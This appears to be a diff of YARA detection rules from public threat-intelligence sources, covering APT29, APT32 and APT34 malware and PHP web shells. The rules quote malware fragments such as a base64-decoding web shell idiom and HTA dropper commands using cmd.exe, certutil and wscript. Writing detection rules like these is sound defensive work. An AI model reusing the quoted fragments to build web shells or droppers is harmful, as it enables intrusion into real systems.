hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
id = "37cfba67-af85-5efe-9b07-9f1e5d9f9195"
strings:
$x1 = "GoogleCrashReport.dll" fullword ascii
$s1 = "CrashErrors" fullword ascii
$s2 = "CrashSend" fullword ascii
$s3 = "CrashAddData" fullword ascii
$s4 = "CrashCleanup" fullword ascii
$s5 = "CrashInit" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
}
rule PAS_TOOL_PHP_WEB_KIT_mod {
meta:
description = "Detects PAS Tool PHP Web Kit"
reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
author = "US CERT - modified by Florian Roth due to performance reasons"
date = "2016/12/29"
id = "6bc75e44-7784-5e48-9bbc-052d84ebee83"
strings:
$php = "<?php"
$base64decode1 = "='base'.("
$strreplace = "str_replace(\"\\n\", ''"
$md5 = ".substr(md5(strrev("
$gzinflate = "gzinflate"
$cookie = "_COOKIE"
$isset = "isset"
condition:
uint32(0) == 0x68703f3c and
$php at 0 and
(filesize > 10KB and filesize < 30KB) and
#cookie == 2 and
#isset == 3 and
all of them
}
rule WebShell_PHP_Web_Kit_v3 {
meta:
description = "Detects PAS Tool PHP Web Kit"
reference = "https://github.com/wordfence/grizzly"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2016/01/01"
id = "dc5fa2c9-3e1e-594d-be4f-141e1f4915f1"
strings:
$php = "<?php $"
$php2 = "@assert(base64_decode($_REQUEST["
$s1 = "(str_replace(\"\\n\", '', '"
$s2 = "(strrev($" ascii
$s3 = "de'.'code';" ascii
condition:
( ( uint32(0) == 0x68703f3c and $php at 0 ) or $php2 ) and
filesize > 8KB and filesize < 100KB and
all of ($s*)
}
rule WebShell_PHP_Web_Kit_v4 {
meta:
description = "Detects PAS Tool PHP Web Kit"
reference = "https://github.com/wordfence/grizzly"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2016/01/01"
id = "a5f915cd-b9c5-5cd3-b0a2-c15f6124737a"
strings:
$php = "<?php $"
$s1 = "(StR_ReplAcE(\"\\n\",'',"
$s2 = ";if(PHP_VERSION<'5'){" ascii
$s3 = "=SuBstr_rePlACe(" ascii
condition:
uint32(0) == 0x68703f3c and
$php at 0 and
filesize > 8KB and filesize < 100KB and
2 of ($s*)
}
rule APT_APT29_wellmess_dotnet_unique_strings {
meta:
description = "Rule to detect WellMess .NET samples based on unique strings and function/variable names"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41"
id = "7a058ec7-f795-5226-b511-ff469a969ee6"
strings:
$s1 = "HealthInterval" wide
$s2 = "Hello from Proxy" wide
$s3 = "Start bot:" wide
$s4 = "FromNormalToBase64" ascii
$s5 = "FromBase64ToNormal" ascii
$s6 = "WellMess" ascii
condition:
uint16(0) == 0x5a4d and uint16(uint16(0x3c)) == 0x4550 and 3 of them
}
rule APT_APT29_sorefang_encryption_key_schedule {
meta:
description = "Rule to detect SoreFang based on the key schedule used for encryption"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "8d89edc1-a9fc-5155-9dc2-8d7f952f90d1"
strings:
$ = { C7 05 ?? ?? ?? ?? 63 51 E1 B7 B8 ?? ?? ?? ?? 8B 48
FC 81 E9 47 86 C8 61 89 08 83 C0 04 3D ?? ?? ?? ??
7E EB 33 D2 33 C9 B8 2C 00 00 00 89 55 D4 33 F6 89
4D D8 33 DB 3B F8 0F 4F C7 8D 04 40 89 45 D0 83 F8
01 7C 4F 0F 1F 80 00 00 00 00 }
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
rule APT_APT29_sorefang_encryption_key_2b62 {
meta:
description = "Rule to detect SoreFang based on hardcoded encryption key"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "9a7abad7-1cfa-52c8-9416-47cb80486714"
strings:
$ = "2b6233eb3e872ff78988f4a8f3f6a3ba"
condition:
( uint16(0) == 0x5A4D and uint16(uint32(0x3c) ) == 0x4550)
and any of them
}
rule APT_APT29_sorefang_directory_enumeration_output_strings {
meta:
description = "Rule to detect SoreFang based on formatted string output for directory enumeration"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "e24dbda1-3d43-52a7-9249-70a648f4913e"
strings:
$ = "----------All usres directory----------"
$ = "----------Desktop directory----------"
$ = "----------Documents directory----------"
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)
and 2 of them
}
rule APT_APT29_sorefang_command_elem_cookie_ga_boundary_string {
meta:
description = "Rule to detect SoreFang based on scheduled task element and Cookie header/boundary strings"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "3c6ffbad-9b39-5518-aa66-d76531ddb9ea"
strings:
$ = "<Command>" wide
$ = "Cookie:_ga="
$ = "------974767299852498929531610575"
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)
and 2 of them
}
rule APT_APT29_sorefang_encryption_round_function {
meta:
description = "Rule to detect SoreFang based on the encryption round function"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "0be1c084-c8df-5920-a320-90364a7fb542"
strings:
$ = { 8A E9 8A FB 8A 5D 0F 02 C9 88 45 0F FE C1 0F BE C5 88 6D F3 8D
14 45 01 00 00 00 0F AF D0 0F BE C5 0F BE C9 0F AF C8 C1 FA 1B C0 E1 05 0A D1 8B 4D EC 0F BE C1 89 55 E4 8D 14 45 01 00 00 00 0F AF D0 8B C1}
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)
and any of them
}
rule APT_APT29_sorefang_add_random_commas_spaces {
meta:
description = "Rule to detect SoreFang based on function that adds commas and spaces"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "9a89c619-6309-500f-b4dc-c8a3e8fc4417"
strings:
$ = { E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B CE 83 FA 04 7E 09 6A
02 68 ?? ?? ?? ?? EB 07 6A 01 68 }
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)
and any of them
}
rule APT_APT29_sorefang_modify_alphabet_custom_encode {
meta:
description = "Rule to detect SoreFang based on arguments passed into custom encoding algorithm function"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "7c5c1be0-ccad-5c8f-a026-445994b1f279"
strings:
$ = { 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46
64 }
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
rule APT_APT29_sorefang_custom_encode_decode {
meta:
description = "Rule to detect SoreFang based on the custom encoding/decoding algorithm function"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "4885a659-bb3a-5e33-99cc-b827931bf58f"
strings:
$ = { 55 8B EC 8B D1 53 56 8B 75 08 8B DE 80 42 62 FA 8A 4A 62 66 D3
EB 57 3A 5A 5C 74 0F}
$ = { 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE C1 88 4A 62 8A
4A 62 B8 01 00 00 00}
$ = { 8A 46 62 84 C0 74 3E 3C 06 73 12 0F B6 C0 B9 06 00 00 00 2B C8
C6 46 62 06 66 D3 66 60 0F B7 4E 60}
$ = { 80 3C 38 0D 0F 84 93 01 00 00 C6 42 62 06 8B 56 14 83 FA 10 72
04 8B 06}
$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5B 3B C8 75 07 8B 55 EC B3 3E}
$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5E 3B C8 75 0B 8B 55 EC D0 EB C6
42 62 05}
$ = { 8B 55 EC 0F BE 04 38 0F B6 DB 0F B6 4A 5F 3B C1 B8 3F 00 00 00
0F 44 D8}
$ = { 8A 4A 62 66 8B 52 60 66 D3 E2 0F B6 C3 66 0B D0 8B 45 EC 66 89
50 60 8A 45 F3 02 C1 88 45 F3 3C 08 72 2E 04 F8 8A C8 88 45 F3
66 D3 EA 8B 4D 08 0F B6 C2 50 }
$ = { 3A 5A 5C 74 0F 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE
C1 88 4A 62 }
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)
and any of them
}
rule APT_APT29_sorefang_remove_chars_comma_space_dot {
meta:
description = "Rule to detect SoreFang based on function that removes commas, spaces and dots"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
id = "c15779b0-6a5e-5345-94ad-95615b567f1f"
strings:
$ = {8A 18 80 FB 2C 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
$ = {8A 18 80 FB 2E 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
$ = {8A 18 80 FB 20 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
rule APT_APT29_sorefang_disk_enumeration_strings {
meta:
description = "Rule to detect SoreFang based on disk enumeration strings"
author = "NCSC"
reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
hash = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
id = "0ff01793-6fb7-5cff-b4e4-6709269ab0f0"
strings:
$ = "\x0D\x0AFree on disk: "
$ = "Total disk: "
$ = "Error in GetDiskFreeSpaceEx\x0D\x0A"
$ = "\x0D\x0AVolume label: "
$ = "Serial number: "
$ = "File system: "
$ = "Error in GetVolumeInformation\x0D\x0A"
$ = "I can not het information about this disk\x0D\x0A"
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)
and all of them
}

View file

@ -0,0 +1,38 @@
rule M_APT_Downloader_BEATDROP {
meta:
author = "Mandiant"
description = "Rule looking for BEATDROP malware"
reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
date = "2022-04-28"
score = 90
id = "5720870e-8989-59f2-998b-019084d091ce"
strings:
$ntdll1 = "ntdll" ascii fullword
$ntdll2 = "C:\\Windows\\System32\\ntdll.dll" ascii fullword nocase
$url1 = "api.trello.com" ascii
$url2 = "/members/me/boards?key=" ascii
$url3 = "/cards?key=" ascii
condition:
uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize < 1MB and all of them
}
rule M_APT_Downloader_BOOMMIC {
meta:
author = "Mandiant"
description = "Rule looking for BOOMMIC malware"
reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
date = "2022-04-28"
score = 75
id = "34ea08a6-5d6f-5cdd-a629-fa36313c98f7"
strings:
$loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D C3 }
$loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }
$func1 = "GetComputerNameExA" ascii
$func2 = "HttpQueryInfoA" ascii
condition:
uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize < 1MB and
(
($loc_10001000 and $func1) or
($loc_100012fd and $func2)
)
}

View file

@ -0,0 +1,305 @@
import "math"
import "pe"
/*
YARA Rules by Volexity
Reference: https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/
*/
rule APT_APT29_Win_FlipFlop_LDR : APT29 {
meta:
author = "threatintel@volexity.com"
date = "2021-05-25"
description = "A loader for the CobaltStrike malware family, which ultimately takes the first and second bytes of an embedded file, and flips them prior to executing the resulting payload."
hash = "ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330"
reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
id = "58696a6f-55a9-5212-9372-a539cc327e6b"
strings:
$s1 = "irnjadle"
$s2 = "BADCFEHGJILKNMPORQTSVUXWZY"
$s3 = "iMrcsofo taBesC yrtpgoarhpciP orived r1v0."
condition:
all of ($s*)
}
rule APT_APT28_Win_FreshFire : APT29 {
meta:
author = "threatintel@volexity.com"
date = "2021-05-27"
description = "The FRESHFIRE malware family. The malware acts as a downloader, pulling down an encrypted snippet of code from a remote source, executing it, and deleting it from the remote server."
hash = "ad67aaa50fd60d02f1378b4155f69cffa9591eaeb80523489a2355512cc30e8c"
reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
id = "050b8e61-139a-5ff5-998a-7de67c9975bf"
strings:
$uniq1 = "UlswcXJJWhtHIHrVqWJJ"
$uniq2 = "gyibvmt\x00"
$path1 = "root/time/%d/%s.json"
$path2 = "C:\\dell.sdr"
$path3 = "root/data/%d/%s.json"
condition:
(
pe.number_of_exports == 1 and pe.exports("WaitPrompt")
) or
any of ($uniq*) or
2 of ($path*)
}
/*
YARA Rules by Florian
Mostly based on MSTICs report
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
Not shared publicly: rules for CobaltStrike loader samples, ISOs, specifc msiexec method found in some samples
only available in THOR and VALHALLA
*/
rule APT_APT29_NOBELIUM_JS_EnvyScout_May21_1 {
meta:
description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
id = "42739aad-a88a-545b-8256-1f727c79c4f8"
strings:
$x1 = "[i].charCodeAt(0) ^ 2);}"
condition:
filesize < 5000KB and 1 of them
}
rule APT_APT29_NOBELIUM_JS_EnvyScout_May21_2 {
meta:
description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
id = "d5cf3365-fe24-533a-a678-b5b6d4d99997"
strings:
$s1 = "saveAs(blob, " ascii
$s2 = ".iso\");" ascii
$s3 = "application/x-cd-image" ascii
$s4 = ".indexOf(\"Win\")!=-1" ascii
condition:
filesize < 5000KB and all of them
}
rule APT_APT29_NOBELIUM_LNK_NV_Link_May21_2 {
meta:
description = "Detects NV Link as used by NOBELIUM group"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
id = "52c2caf9-13df-5614-9c9e-afcd76ec77f9"
strings:
$s1 = "RegisterOCX BOOM" ascii wide
$s2 = "cmd.exe /c start BOOM.exe" ascii wide
condition:
filesize < 5000KB and 1 of them
}
rule APT_APT29_NOBELIUM_LNK_Samples_May21_1 {
meta:
description = "Detects link file characteristics as described in APT29 NOBELIUM report"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
date = "2021-05-27"
score = 85
hash1 = "24caf54e7c3fe308444093f7ac64d6d520c8f44ea4251e09e24931bdb72f5548"
id = "c807ab5a-f66a-5622-81b1-6e69b6df8446"
strings:
$a1 = "rundll32.exe" wide
$sa1 = "IMGMountingService.dll" wide
$sa2 = "MountImgHelper" wide
$sb1 = "diassvcs.dll" wide
$sb2 = "InitializeComponent" wide
$sc1 = "MsDiskMountService.dll" wide
$sc2 = "DiskDriveIni" wide
$sd1 = "GraphicalComponent.dll" wide
$sd2 = "VisualServiceComponent" wide
$se1 = "data/mstu.dll,MicrosoftUpdateService" wide
condition:
uint16(0) == 0x004c and
filesize < 4KB and $a1 and
( all of ($sa*) or all of ($sb*) or all of ($sc*) or all of ($sd*) or all of ($se*) )
}
rule APT_APT29_NOBELIUM_BoomBox_May21_1 {
meta:
description = "Detects BoomBox malware as described in APT29 NOBELIUM report"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
date = "2021-05-27"
score = 85
id = "fe964f3e-1cda-5f16-838f-dd7b23cd5651"
strings:
$xa1 = "123do3y4r378o5t34onf7t3o573tfo73" ascii wide fullword
$xa2 = "1233t04p7jn3n4rg" ascii wide fullword
condition:
1 of them
}
rule APT_APT29_NOBELIUM_BoomBox_PDF_Masq_May21_1 {
meta:
description = "Detects PDF documents as used by BoomBox as described in APT29 NOBELIUM report"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
date = "2021-05-27"
score = 70
id = "bdfb9600-edda-5c8c-ab23-14fb71c8e647"
strings:
$ah1 = { 25 50 44 46 2d 31 2e 33 0a 25 } /* PDF Header */
$af1 = { 0a 25 25 45 4f 46 0a } /* EOF */
$fp1 = "endobj" ascii
$fp2 = "endstream" ascii
$fp3 = { 20 6F 62 6A 0A } /* obj\x0a */
condition:
$ah1 at 0 and $af1 at (filesize-7) and filesize < 100KB
and not 1 of ($fp*)
and math.entropy(16,filesize) > 7
}
rule APT_APT29_NOBELIUM_NativeZone_Loader_May21_1 {
meta:
description = "Detects NativeZone loader as described in APT29 NOBELIUM report"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
date = "2021-05-27"
score = 85
hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
id = "02d9257d-f439-5071-96b0-a973b088e329"
strings:
$s1 = "\\SystemCertificates\\Lib\\CertPKIProvider.dll" ascii
$s2 = "rundll32.exe %s %s" ascii fullword
$s3 = "eglGetConfigs" ascii fullword
$op1 = { 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 33 db 89 5d fc }
$op2 = { 8b 46 18 e9 30 ff ff ff 90 87 2f 00 10 90 2f 00 10 }
$op3 = { e8 14 dd ff ff 8b f1 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 }
condition:
uint16(0) == 0x5a4d and
filesize < 3000KB and 3 of them or 4 of them
}
rule APT_APT29_NOBELIUM_BoomBox_May21_2 {
meta:
description = "Detects BoomBox malware used by APT29 / NOBELIUM"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
hash3 = "cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c"
id = "a4144c00-48b2-5520-b773-5d0a5de95fb1"
strings:
$x1 = "\\Microsoft\\NativeCache\\NativeCacheSvc.dll" wide
$x2 = "\\NativeCacheSvc.dll _configNativeCache" wide
$a1 = "/content.dropboxapi.com" wide fullword
$s1 = "rundll32.exe {0} {1}" wide fullword
$s2 = "\\\\CertPKIProvider.dll" wide
$s3 = "/tmp/readme.pdf" wide
$s4 = "temp/[^\"]*)\"" wide fullword
$op1 = { 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 01 2f 4f 00 72 00 }
$op2 = { 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 }
$op3 = { 4d 05 20 00 12 80 91 04 20 01 08 0e 04 20 00 12 }
condition:
uint16(0) == 0x5a4d and
filesize < 40KB and
3 of them or 4 of them
}
rule APT_APT29_NOBELIUM_Malware_May21_2 {
meta:
description = "Detects malware used by APT29 / NOBELIUM"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
hash1 = "292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8"
hash2 = "776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b"
id = "b1462b4b-227f-5aeb-92ea-bda6a86831c7"
strings:
$op1 = { 48 03 c8 42 0f b6 04 21 88 03 0f b6 43 01 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
$op2 = { 48 03 c8 42 0f b6 04 21 88 43 01 41 0f b6 c7 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
$op3 = { 45 0f b6 43 ff 41 8b c2 99 44 88 03 41 0f b6 2b 83 e2 03 03 c2 40 88 6b 01 }
condition:
filesize < 2200KB and
all of them
}
rule APT_APT29_NOBELIUM_Stageless_Loader_May21_2 {
meta:
description = "Detects stageless loader as used by APT29 / NOBELIUM"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
hash1 = "a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf"
hash2 = "c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78"
id = "7b83d327-52fc-5401-ae35-00f6b825678a"
strings:
$x1 = "DLL_stageless.dll" ascii fullword
$s1 = "c:\\users\\devuser\\documents" ascii fullword nocase
$s2 = "VisualServiceComponent" ascii fullword
$s3 = "CheckUpdteFrameJavaCurrentVersion" ascii fullword
$op1 = { a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 }
$op2 = { ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 e8 d4 00 10 }
condition:
uint16(0) == 0x5a4d and
filesize < 900KB and
2 of them or 3 of them
}
rule APT_APT29_NOBELIUM_Malware_May21_3 {
meta:
description = "Detects malware used by APT29 / NOBELIUM"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
hash1 = "2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e"
id = "89cb6884-4242-5b5a-b0ac-b31041dd261c"
strings:
$s1 = "Win32Project1.dll" ascii fullword
$op1 = { 59 c3 6a 08 68 70 5e 01 10 e8 d2 8c ff ff 8b 7d 08 8b c7 c1 f8 05 }
$op2 = { 8d 4d f0 e8 c4 12 00 00 68 64 5b 01 10 8d 45 f0 c7 45 f0 6c 01 01 10 50 e8 ea 13 00 00 cc }
$op4 = { 40 c3 8b 65 e8 e8 a6 86 ff ff cc 6a 0c 68 88 60 01 10 e8 b0 4d ff ff }
$xc1 = { 25 73 25 73 00 00 00 00 2F 65 2C 20 00 00 00 00
43 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00
77 00 73 00 5C 00 65 00 78 00 70 00 6C 00 6F 00
72 00 65 00 72 00 2E 00 65 00 78 00 65 }
condition:
filesize < 3000KB and
( $xc1 or 3 of them )
}
rule APT_APT29_NOBELIUM_Malware_May21_4 {
meta:
description = "Detects malware used by APT29 / NOBELIUM"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
date = "2021-05-29"
hash1 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
id = "56193475-52b4-5720-abc5-72249e2a0c37"
strings:
$s1 = "KM.FileSystem.dll" ascii fullword
$op1 = { 80 3d 50 6b 04 10 00 0f 85 96 00 00 00 33 c0 40 b9 48 6b 04 10 87 01 33 db 89 5d fc }
$op2 = { c3 33 c0 b9 7c 6f 04 10 40 87 01 c3 8b ff 55 }
$op3 = { 8d 4d f4 e8 53 ff ff ff 68 d0 22 01 10 8d 45 f4 50 e8 d8 05 00 00 cc 8b 41 04 }
$xc1 = { 2E 64 6C 6C 00 00 00 00 41 53 4B 4F 44 00 00 00
53 75 63 63 65 73 73 }
condition:
uint16(0) == 0x5a4d and
filesize < 3000KB and
( $xc1 or 3 of them )
}

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,49 @@
import "pe"
rule EXT_APT32_goopdate_installer {
meta:
reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
author = "Facebook"
description = "Detects APT32 installer side-loaded with goopdate.dll"
sample = "69730f2c2bb9668a17f8dfa1f1523e0e1e997ba98f027ce98f5cbaa869347383"
id = "08f3cbda-ccb7-517a-b205-5f71de26c735"
strings:
$s0 = { 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? }
$s1 = "GetProcAddress"
$s2 = { 8B 4D FC ?? ?? 0F B6 51 0C ?? ?? 8B 4D F0 0F B6 1C 01 33 DA }
$s3 = "FindNextFileW"
$s4 = "Process32NextW"
condition:
(pe.is_64bit() or pe.is_32bit()) and
all of them
}
rule EXT_APT32_osx_backdoor_loader {
meta:
reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
author = "Facebook"
description = "Detects APT32 backdoor loader on OSX"
sample = "768510fa9eb807bba9c3dcb3c7f87b771e20fa3d81247539e9ea4349205e39eb"
id = "ac313bd8-bf15-5b72-b651-35015f71dd90"
strings:
$a1 = { 00 D2 44 8A 04 0F 44 88 C0 C0 E8 07 08 D0 88 44 0F FF 48 FF C1 48 83 F9 10 44 88 C2 }
$a2 = { 41 0F 10 04 07 0F 57 84 05 A0 FE FF FF 41 0F 11 04 07 48 83 C0 10 48 83 F8 10 75 }
// Encrypted data
$e1 = { CA CF 3E F2 DA 43 E6 D1 D5 6C D4 23 3A AE F1 B2 } // Decoded to drop filepath: '/tmp/panels'
$e2 = "MlkHVdRbOkra9s+G65MAoLga340t3+zj/u8LPfP3hig=" // Decoded to export API name 'ArchaeologistCodeine'
$e3 = { 5A 69 98 0E 6C 4B 5C 69 7E 19 34 3B C3 07 CA 13 } // Decoded to 'ifconfig -l'
$e4 = "1Sib4HfPuRQjpxIpECnxxTPiu3FXOFAHMx/+9MEVv9M+h1ngV7T5WUP3b0zsg0Qd" // Decoded to export API 'PlayerAberadurtheIncomprehensible'
// Decoded export func names
$e5 = "_ArchaeologistCodeine"
$e6 = "_PlayerAberadurtheIncomprehensible"
condition:
((uint32(0) == 0xfeedface or uint32be(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf or uint32be(0) == 0xfeedfacf)) and
(
2 of ($e*) or
all of ($a*)
)
}

View file

@ -0,0 +1,59 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-12-07
Identifier: APT 34
Reference: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
*/
/* Rule Set ----------------------------------------------------------------- */
rule APT34_Malware_HTA {
meta:
description = "Detects APT 34 malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
date = "2017-12-07"
hash1 = "f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a"
id = "683faded-7e4b-5b2f-9f85-300db96ed9d1"
strings:
$x1 = "WshShell.run \"cmd.exe /C C:\\ProgramData\\" ascii
$x2 = ".bat&ping 127.0.0.1 -n 6 > nul&wscript /b" ascii
$x3 = "cmd.exe /C certutil -f -decode C:\\ProgramData\\" ascii
$x4 = "a.WriteLine(\"set Shell0 = CreateObject(" ascii
$x5 = "& vbCrLf & \"Shell0.run" ascii
$s1 = "<title>Blog.tkacprow.pl: HTA Hello World!</title>" fullword ascii
